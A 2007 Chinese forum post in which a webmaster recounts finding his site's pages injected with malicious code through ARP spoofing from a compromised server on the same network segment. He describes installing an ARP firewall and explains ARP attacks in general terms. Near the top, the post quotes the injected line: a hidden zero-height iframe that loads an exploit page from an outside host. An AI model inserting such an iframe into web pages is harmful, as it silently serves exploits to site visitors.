热搜词
发表于 2007-9-10 13:01:44 | 显示全部楼层 |阅读模式
今天凌晨一打开自己的网站,卡巴就弹出来说有病毒,报告为“恶意程序 Exploit.Win32.IMG-ANI.k 文件: F:\Documents and Settings\*****\Local Settings\Temporary Internet Files\Content.IE5\DF7VHPOE\love[1].jpg”,然后网页显示的也有问题,最上方居然裸露出来了一小段源码,于是马上查看源码,发现代码居然被改了。

最上面变成了:

<HTML><iFrAmE SRc=http://s72.911520.net/site/gg/p.htm height=0 width=100></IfRaMe> tml; charset=gb2312">

我的第一反应就是网站被人挂马了,首先想到的是不是程序有漏洞,被人传了木马,赶紧用FTP连上,检查ASP文件,发现所有的ASP文件都没有是今天修改过的,模板系统也没有问题,这下我真的不知道怎么办了。都搞不清楚问题出在哪里。。。。

然后我对挂马的这个网站来了兴趣,在百度里一搜“911520.net”,

http://www.baidu.com/s?word=doma ... ;ie=gb2312&ct=0

发现有一条的结果的标题是“服务器被ARP欺骗,大家请不要访问我的站”,看了一下那条帖子,然后又联想到昨天下午收到了IDC的短信,提醒说最近ARP病毒泛滥,于是我马上就想到应该是受到ARP攻击了。

下午我还去IDC的网站上看了一下,有一篇关于防范ARP攻击的公告,还提供了ARP防范工具下载,赶紧下了,然后安装。

这个软件是ARP防火墙(Anti ARP Sniffer),下载地址:http://www.antiarp.com/newsopen2.asp?ArticleID=24

官网:http://www.antiarp.com/

刚装上以后ARP防火墙启动不了,于是重启服务器,顺利启动了,然后就看到ARP防火墙提示受到ARP攻击了,还能跟踪到攻击的来源IP。

装上ARP防火墙以后,再访问网站,一切正常。

MUD,看来ARP攻击才是最高明的攻击方法嘛,MUD!

ARP攻击的先进性就好比DNS劫持一样,处于最上层。网页实际的文件并没有改变,但是发送给浏览器以后就变了样了,被病毒给改了。

相关知识:

ARP即Address Resolution Protocol,将网络IP地址映射至网卡硬件MAC地址的协议。一般危害为欺骗同网段内的其他服务器地址,截获其数据报文、监听数据传输、盗取帐号信息,甚至对来访数据包进行欺骗和伪造。该病毒发作方式为:网段内一台服务器中此病毒,病毒将以此机器作为肉鸡,对同网段服务器进行数据劫持和欺骗。类似于夺取同段内的其他服务器的IP,导致合法服务器无法正常通讯。此病毒还可对网关地址进行欺骗,造成此网段所有IP地址都无法正常解析。以致网络大面积瘫痪。

我这次的情形就是上面说的“对来访数据包进行欺骗和伪造”、“对同网段服务器进行数据劫持和欺骗”,ARP防火墙查到了攻击源,是同网段内的一台机子,我看了一下那台机子,居然是用IIS的默认站点建的站(可以直接用IP访问),估计系统漏洞不少,被人攻击中毒了,然后连累到我们同网段内的其他无辜的用户。

安全很重要!尤其是在最近病毒木马泛滥的日子里。

全部评论0
回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-11-23 00:42 , Processed in 0.177495 second(s), 22 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team